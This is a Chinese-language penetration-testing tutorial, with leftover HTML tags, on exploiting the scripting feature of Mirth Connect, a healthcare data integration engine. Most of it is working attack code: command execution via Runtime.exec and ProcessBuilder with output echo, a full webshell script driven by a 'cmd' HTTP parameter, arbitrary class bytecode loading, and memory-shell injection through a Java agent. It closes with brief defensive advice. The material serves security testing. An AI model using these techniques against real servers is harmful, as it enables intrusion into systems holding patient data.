Mirth Connect 渗透测试与利用技术详解<\/h1>

1. Mirth Connect 简介<\/h2>

Mirth Connect 是一个开源的医疗信息集成系统，主要用于医疗行业的数据交换和转换。它具有以下特点：<\/p>

支持多种医疗消息标准的转换、过滤、提取和路由<\/li>
可管理从小型诊所到大型医疗信息交换系统的患者数据<\/li>

提供直观的管理界面，便于开发和管理消息通道<\/li> <\/ul>

2. 环境搭建<\/h2>

从 GitHub 下载 Mirth Connect：https:\/\/github.com\/nextgenhealthcare\/connect\/releases<\/li>
安装过程简单，会自动下载所需 JDK<\/li>
安装完成后，双击运行 "Mirth Connect Administrator"<\/li>

在管理界面点击"启动"按钮即可运行服务<\/li> <\/ol>

3. 命令执行漏洞利用<\/h2>

3.1 基本命令执行<\/h3>

新建一个 HTTP 监听通道<\/li>
在通道设置中找到"脚本执行"功能区域<\/li>

通过调用 Java 的

Runtime.exec()<\/code> 方法可以实现命令执行：
java<\/span>.lang<\/span>.Runtime<\/span>.getRuntime<\/span>().exec<\/span>("calc.exe"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
测试可成功弹出计算器，证明命令执行可行<\/li>
<\/ol>
3.2 命令回显技术<\/h3>

将 Response:<\/code> 设置为 Postprocessor<\/code> 可以实现回显<\/li>
使用 ProcessBuilder<\/code> 执行命令并获取输出：
var<\/span> var2<\/span> =<\/span> new<\/span> java<\/span>.util<\/span>.Scanner<\/span>(new<\/span> java<\/span>.lang<\/span>.ProcessBuilder<\/span>("cmd.exe"<\/span>, "\/c"<\/span>, "whoami"<\/span>).start<\/span>().getInputStream<\/span>()).useDelimiter<\/span>("\\A"<\/span>).next<\/span>();
<\/span><\/span>return<\/span> var2<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.3 构建 Webshell<\/h3>
通过获取 HTTP 请求参数实现交互式命令执行：<\/p>
try<\/span> {
<\/span><\/span>    var<\/span> var4<\/span> =<\/span> sourceMap<\/span>.get<\/span>("parameters"<\/span>);
<\/span><\/span>    var<\/span> var3<\/span> =<\/span> var4<\/span>.get<\/span>("cmd"<\/span>);
<\/span><\/span>    var<\/span> isWindows<\/span> =<\/span> java<\/span>.lang<\/span>.System<\/span>.getProperty<\/span>("os.name"<\/span>).toLowerCase<\/span>().contains<\/span>("win"<\/span>);
<\/span><\/span>    var<\/span> command<\/span> =<\/span> isWindows<\/span> ?<\/span> ["cmd.exe"<\/span>, "\/c"<\/span>, var3<\/span>] :<\/span> ["\/bin\/sh"<\/span>, "-c"<\/span>, var3<\/span>];
<\/span><\/span>    var<\/span> var2<\/span> =<\/span> new<\/span> java<\/span>.util<\/span>.Scanner<\/span>(new<\/span> java<\/span>.lang<\/span>.ProcessBuilder<\/span>(command<\/span>).start<\/span>().getInputStream<\/span>()).useDelimiter<\/span>("\\A"<\/span>).next<\/span>();
<\/span><\/span>} catch<\/span> (e<\/span>) {
<\/span><\/span>    return<\/span> e<\/span>;
<\/span><\/span>}
<\/span><\/span>return<\/span> var2<\/span>;
<\/span><\/span><\/code><\/pre>使用方法：访问 http:\/\/target:port?cmd=whoami<\/code> 即可执行命令并回显结果<\/p>
4. 内存马注入尝试<\/h2>
4.1 环境分析<\/h3>

Mirth Connect 使用 Jetty 作为中间件<\/li>
通过查看进程发现监听端口（10010、10086 和 18080）由同一进程启动<\/li>
使用 JMX 工具生成 Jetty 内存马尝试注入<\/li>
<\/ol>
4.2 注入失败分析<\/h3>


手动测试 Class 加载：<\/p>
var<\/span> bytes<\/span> =<\/span> [0xca<\/span>, 0xfe<\/span>, 0xba<\/span>, 0xbe<\/span>, ...]; \/\/ 恶意class字节码
<\/span><\/span><\/span><\/span>var<\/span> clazz<\/span> =<\/span> new<\/span> java<\/span>.lang<\/span>.ClassLoader<\/span>().defineClass<\/span>(null<\/span>, bytes<\/span>, 0<\/span>, bytes<\/span>.length<\/span>);
<\/span><\/span>clazz<\/span>.newInstance<\/span>();
<\/span><\/span><\/code><\/pre>
可以成功加载并执行（如弹出计算器）<\/li>
<\/ul>
<\/li>

ClassLoader 层级问题：<\/p>

各端口使用 URLClassLoader<\/li>
Jetty 的 WebAppClassLoader 位于 URLClassLoader 之下<\/li>
Java 父 ClassLoader 无法访问子 ClassLoader<\/li>
导致无法直接注入内存马<\/li>
<\/ul>
<\/li>
<\/ol>
4.3 成功注入方案<\/h3>
使用 Java Agent 技术通过 ins.getAllLoadedClasses()<\/code> 获取所有 ClassLoader：<\/p>

使用 vagent 工具注入<\/li>
成功部署内存马<\/li>
<\/ol>
5. 防御建议<\/h2>

修改默认密码，使用强密码策略<\/li>
限制管理界面访问权限<\/li>
定期更新 Mirth Connect 到最新版本<\/li>
监控可疑的脚本修改行为<\/li>
对通道脚本功能进行权限控制<\/li>
使用网络隔离，限制不必要的端口访问<\/li>
<\/ol>
6. 总结<\/h2>
Mirth Connect 由于提供了强大的脚本功能，在配置不当或使用弱密码的情况下，攻击者可以：<\/p>

通过脚本功能实现命令执行<\/li>
构建交互式 Webshell<\/li>
在特定条件下注入内存马<\/li>
<\/ol>
渗透测试人员应重点检查：<\/p>

默认\/弱密码问题<\/li>
不必要的通道脚本权限<\/li>
未授权访问的管理界面<\/li>
<\/ul>